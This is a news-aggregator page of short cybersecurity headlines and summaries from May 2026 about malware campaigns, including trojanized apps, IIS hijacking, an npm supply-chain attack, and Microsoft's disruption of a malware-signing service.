Collecting Cyber-News from over 60 sources

Tag: malware

TamperedChef Malware Hides in Signed Apps to Drop Stealers and RATs

May 21, 2026 1:00 PM

Tags: access, cyber, intelligence, malware, rat, threat, tool

A large-scale malware campaign dubbed “TamperedChef” is leveraging trojanized productivity applications such as PDF editors, calendar tools, and file converters to silently deploy information stealers and remote access trojans (RATs), according to recent threat intelligence findings. Security researchers have identified multiple activity clusters linked to this evolving threat, including CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110. While these…
BadIIS Malware Hijacks IIS Servers to Redirect Users to Illicit Sites

May 21, 2026 8:00 AM

Tags: china, cyber, cybercrime, malware, microsoft, service

A new variant of the BadIIS malware that hijacks Microsoft IIS web servers to redirect users to illicit websites, highlighting an evolving malware-as-a-service (MaaS) ecosystem operated by Chinese-speaking cybercrime groups. The newly analyzed variant is marked by embedded “demo.pdb” strings, which Talos used to trace its development history. Evidence suggests the malware has been actively…
BadIIS Malware Hijacks IIS Servers to Redirect Users to Illicit Sites

May 21, 2026 8:00 AM

Tags: china, cyber, cybercrime, malware, microsoft, service

A new variant of the BadIIS malware that hijacks Microsoft IIS web servers to redirect users to illicit websites, highlighting an evolving malware-as-a-service (MaaS) ecosystem operated by Chinese-speaking cybercrime groups. The newly analyzed variant is marked by embedded “demo.pdb” strings, which Talos used to trace its development history. Evidence suggests the malware has been actively…
WantToCry Ransomware Exploits SMB to Encrypt Remote Files

May 21, 2026 8:00 AM

Tags: access, cyber, data, data-breach, detection, exploit, malware, ransomware, service, tool

A new ransomware campaign named “WantToCry” that leverages exposed Server Message Block (SMB) services to gain access and encrypt victim data without deploying traditional malware on compromised systems. This approach significantly reduces the detection surface, making it harder for conventional security tools to identify the attack. The name “WantToCry” appears to reference the infamous WannaCry…
Ukraine identifies infostealer operator tied to 28,000 stolen accounts

May 21, 2026 12:00 AM

Tags: breach, law, malware, ukraine

The Ukrainian cyberpolice, working in conjunction with U.S. law enforcement, has identified an 18-year-old man from Odesa suspected of running an infostealer malware operation targeting users of an online store in California. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ukraine-identifies-infostealer-operator-tied-to-28-000-stolen-accounts/
Microsoft Disrupts Malware-Signing Service Used by Ransomware Gangs

May 20, 2026 11:02 PM

Tags: malware, microsoft, ransomware, service

Microsoft disrupted the Fox Tempest operation after attackers abused Azure Artifact Signing to distribute malware disguised as trusted software. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/microsoft-disrupts-malware-signing-service-used-by-ransomware-gangs/
Microsoft disrupts cybercrime operation that hid behind legitimate software

May 20, 2026 6:00 PM

Tags: cybercrime, malware, microsoft, ransomware, service, software

The Fox Tempest malware-signing-as-a-service operation was linked to numerous ransomware attacks. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/microsoft-disrupts-cybercrime-hid-legitimate-software/820724/
Android Malware Campaign Used Hundreds of Fake Apps to Silently Charge Users

May 20, 2026 6:00 PM

Tags: android, malware, service

Premium Deception campaign uses 250 Android apps to silently sign victims up to paid services First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/android-carrier-billing-fraud-four/
Microsoft Takes Down Malware-Signing Service Behind Ransomware Attacks

May 20, 2026 6:00 PM

Tags: attack, malicious, malware, microsoft, network, ransomware, service, threat

Microsoft on Tuesday said it disrupted a malware-signing-as-a-service (MSaaS) operation that weaponized the company’s Artifact Signing system to deliver malicious code and conduct ransomware and other attacks, compromising thousands of machines and networks across the world.The tech giant attributed the activity to a threat actor it calls Fox Tempest, which it said offered the MSaaS…
Ukraine says Russia is deploying AI-powered malware on the battlefield

May 20, 2026 4:00 PM

Tags: ai, cyber, defense, malware, russia, social-engineering, ukraine

A new report from Ukraine’s National Security and Defense Council says Russia’s use of AI across cyber operations expanded dramatically over the past year, reshaping everything from social engineering campaigns to malware development and creating what Ukrainian officials describe as a growing imbalance between attackers and defenders. First seen on therecord.media Jump to article: therecord.media/ukraine-says-russia-using-ai-malware-on-battlefield
Ukraine says Russia is deploying AI-powered malware on the battlefield

May 20, 2026 4:00 PM

Tags: ai, cyber, defense, malware, russia, social-engineering, ukraine

A new report from Ukraine’s National Security and Defense Council says Russia’s use of AI across cyber operations expanded dramatically over the past year, reshaping everything from social engineering campaigns to malware development and creating what Ukrainian officials describe as a growing imbalance between attackers and defenders. First seen on therecord.media Jump to article: therecord.media/ukraine-says-russia-using-ai-malware-on-battlefield
Gremlin Stealer Hides C2 and Exfiltration Paths in Encrypted Resources

May 20, 2026 4:00 PM

Tags: control, credentials, crypto, cyber, data, infrastructure, malware

A newly identified variant of the Gremlin stealer malware is leveraging advanced obfuscation techniques to conceal its command-and-control (C2) infrastructure and data exfiltration logic within encrypted .NET resource sections. This evolution highlights a significant shift toward stealth, modularity, and anti-analysis sophistication in modern infostealer campaigns. Its targets include browser-stored credentials, session tokens, cryptocurrency wallets, clipboard…
Neue Malware ‘TencShell” zielt auf Unternehmensnetzwerke und Lieferketten

May 20, 2026 3:00 PM

Tags: backdoor, malware, network

Sicherheitsforscher von Cato Networks haben eine bislang unbekannte Backdoor-Malware entdeckt, die gezielt auf Unternehmensumgebungen abzielt. First seen on it-daily.net Jump to article: www.it-daily.net/it-sicherheit/cybercrime/malware-tencshell-unternehmensnetzwerke
GraphWorm Malware Abuses Microsoft OneDrive for Stealthy C2 Operations

May 20, 2026 2:01 PM

Tags: china, cloud, control, cyber, espionage, government, group, malware, microsoft, threat

A new activity from Webworm, a China-aligned advanced persistent threat (APT) group, revealing a significant evolution in its cyber espionage toolkit during 2025. The group, first publicly documented in 2022, has shifted its targeting from primarily Asian organizations to government entities across Europe, while adopting stealthier techniques and cloud-based command-and-control (C2) infrastructure. One of the…
GraphWorm Malware Abuses Microsoft OneDrive for Stealthy C2 Operations

May 20, 2026 2:01 PM

Tags: china, cloud, control, cyber, espionage, government, group, malware, microsoft, threat

A new activity from Webworm, a China-aligned advanced persistent threat (APT) group, revealing a significant evolution in its cyber espionage toolkit during 2025. The group, first publicly documented in 2022, has shifted its targeting from primarily Asian organizations to government entities across Europe, while adopting stealthier techniques and cloud-based command-and-control (C2) infrastructure. One of the…
Fox Tempest Linked to Malware-Signing Service Abusing Microsoft Artifact Signing

May 20, 2026 2:01 PM

Tags: cyber, cybercrime, group, intelligence, malicious, malware, microsoft, ransomware, service, software, threat

Fox Tempest, a financially motivated threat actor, has been linked to a large-scale malware-signing-as-a-service (MSaaS) operation that abused Microsoft’s Artefact Signing platform to enable cybercriminals to distribute malicious software that appeared to be trusted. According to Microsoft Threat Intelligence, the group enabled ransomware campaigns and malware distribution by generating fraudulent but valid code-signing certificates, allowing…
Fake Tax Assessment Pages Spread Windows Malware

May 20, 2026 2:01 PM

Tags: cyber, hacker, india, malware, windows

Hackers are actively targeting Windows users with fake Indian Income Tax assessment pages in a campaign tracked as TAX#TRIDENT. The campaign begins with fraudulent tax assessment or penalty pages designed to create urgency. Victims are prompted to download what appears to be an official document, often packaged as a ZIP archive. Once opened, the archive…
Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks

May 20, 2026 12:00 PM

Tags: data, finance, malware, rat, update

Banana RAT malware hidden in fake invoices and security update screens targets customers at 16 Brazilian banks stealing data with QR fraud. First seen on hackread.com Jump to article: hackread.com/banana-rat-malware-fake-invoices-16-brazilian-banks/
Trapdoor Android Ad Fraud Ring Abuses 455 Apps for Fake Clicks

May 20, 2026 10:00 AM

Tags: android, control, cyber, fraud, malicious, malware

A large-scale Android ad fraud campaign named “Trapdoor,” exposing a sophisticated ecosystem built on 455 malicious apps and 183 command-and-control (C2) domains. The operation combines malvertising, automated click fraud, and advanced evasion techniques to create a self-sustaining revenue loop that has generated massive fraudulent traffic across the digital advertising ecosystem. At its peak, Trapdoor generated…
DevilNFC Malware Traps Android Users in NFC Relay Attacks

May 20, 2026 9:00 AM

Tags: android, attack, china, cyber, cybersecurity, malware, nfc, service

A newly identified Android malware family named DevilNFC is raising concern among cybersecurity researchers for its advanced use of kiosk mode to trap victims during NFC relay attacks. These malware families mark a significant evolution in NFC relay threats. Unlike earlier campaigns dominated by Chinese-speaking Malware-as-a-Service ecosystems, DevilNFC and NFCMultiPay are developed by independent regional…
Mini Shai-Hulud Attack Hits npm Ecosystem, Compromising Over 600 Packages

May 20, 2026 9:00 AM

Tags: attack, cyber, malware, supply-chain

A large-scale supply chain attack targeting the npm ecosystem has resurfaced with a new variant of the Mini Shai-Hulud malware, compromising more than 600 packages and introducing advanced evasion techniques, including forged Sigstore provenance. The attack primarily targeted the widely used @antv ecosystem but quickly spread to other popular libraries and developer tools. The attack…
Hackers Exploit MSHTA to Deploy LummaStealer and Amatera Malware

May 20, 2026 9:00 AM

Tags: cyber, exploit, hacker, Internet, malware, microsoft, windows

Hackers are increasingly abusing the legacy Microsoft HTML Application Host (MSHTA) utility to deliver commodity malware such as LummaStealer and Amatera. Despite being tied to Internet Explorer, which was retired in 2022, MSHTA remains default in Windows, making it an attractive Living-off-the-Land binary (LOLBIN) for stealthy attacks. MSHTA allows execution of VBScript and JavaScript from…
Hackers Exploit MSHTA to Deploy LummaStealer and Amatera Malware

May 20, 2026 9:00 AM

Tags: cyber, exploit, hacker, Internet, malware, microsoft, windows

Hackers are increasingly abusing the legacy Microsoft HTML Application Host (MSHTA) utility to deliver commodity malware such as LummaStealer and Amatera. Despite being tied to Internet Explorer, which was retired in 2022, MSHTA remains default in Windows, making it an attractive Living-off-the-Land binary (LOLBIN) for stealthy attacks. MSHTA allows execution of VBScript and JavaScript from…
Android Ad Fraud Operation Generates 659M Bid Requests

May 20, 2026 5:00 AM

Tags: android, control, cybercrime, fraud, malicious, malware, scam, threat

Researchers Identify 455 Malicious Apps Tied to Global Malvertising Campaign. Cybercriminals used malicious Android apps to funnel unwitting users to an ad fraud scam that generated up to 659 million daily bid requests, reports Human Security. The scam has spanned 455 malicious Android apps and is linked to 183 threat actor-owned command-and-control domains. First seen…
Cybercrime service disrupted for abusing Microsoft platform to sign malware

May 20, 2026 1:00 AM

Tags: cybercrime, malware, microsoft, ransomware, service

Microsoft says it has disrupted a malware-signing-as-a-service (MSaaS) operation that abused the company’s Artifact Signing service to generate fraudulent code-signing certificates used by ransomware gangs and other cybercriminals. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/cybercrime-service-disrupted-for-abusing-microsoft-platform-to-sign-malware/
Cybercrime service disrupted for abusing Microsoft platform to sign malware

May 20, 2026 1:00 AM

Tags: cybercrime, malware, microsoft, ransomware, service

Microsoft says it has disrupted a malware-signing-as-a-service (MSaaS) operation that abused the company’s Artifact Signing service to generate fraudulent code-signing certificates used by ransomware gangs and other cybercriminals. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/cybercrime-service-disrupted-for-abusing-microsoft-platform-to-sign-malware/
Mac Users Face New Malware Threat Spoofing Apple, Google, and Microsoft

May 19, 2026 10:00 PM

Tags: apple, business, crypto, data, google, macOS, malware, microsoft, password, threat

A new SHub Reaper macOS infostealer spoofs prompts from Apple, Google, and Microsoft to steal passwords, crypto data, and business files from Macs. The post Mac Users Face New Malware Threat Spoofing Apple, Google, and Microsoft appeared first on TechRepublic. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-reaper-shub-malware-mac-users/
Mac Users Face New Malware Threat Spoofing Apple, Google, and Microsoft

May 19, 2026 10:00 PM

Tags: apple, business, crypto, data, google, macOS, malware, microsoft, password, threat

A new SHub Reaper macOS infostealer spoofs prompts from Apple, Google, and Microsoft to steal passwords, crypto data, and business files from Macs. The post Mac Users Face New Malware Threat Spoofing Apple, Google, and Microsoft appeared first on TechRepublic. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-reaper-shub-malware-mac-users/
Microsoft dismantled malware-signing network Fox Tempest

May 19, 2026 9:00 PM

Tags: cybercrime, malicious, malware, microsoft, network, service, software, threat

Microsoft disrupted Fox Tempest, a malware-signing-as-a-service (MSaaS) that allowed attackers to sign malware with fake trusted certificates. Microsoft said it disrupted a cybercrime operation run by a threat actor named Fox Tempest, which helped threat actors sign malware with short-lived certificates to make malicious software appear legitimate. The service abused Microsoft Artifact Signing and supported…
Trapdoor Android Ad Fraud Scheme Hit 659 Million Daily Bid Requests Using 455 Apps

May 19, 2026 8:00 PM

Tags: android, control, cybersecurity, fraud, infrastructure, intelligence, malicious, malware, threat

Cybersecurity researchers have disclosed details of a new ad fraud and malvertising operation dubbed Trapdoor targeting Android device users.The activity, per HUMAN’s Satori Threat Intelligence and Research Team, encompassed 455 malicious Android apps and 183 threat actor-owned command-and-control (C2) domains, turning the infrastructure into a pipeline for multi-stage fraud.”Users First seen on thehackernews.com Jump to…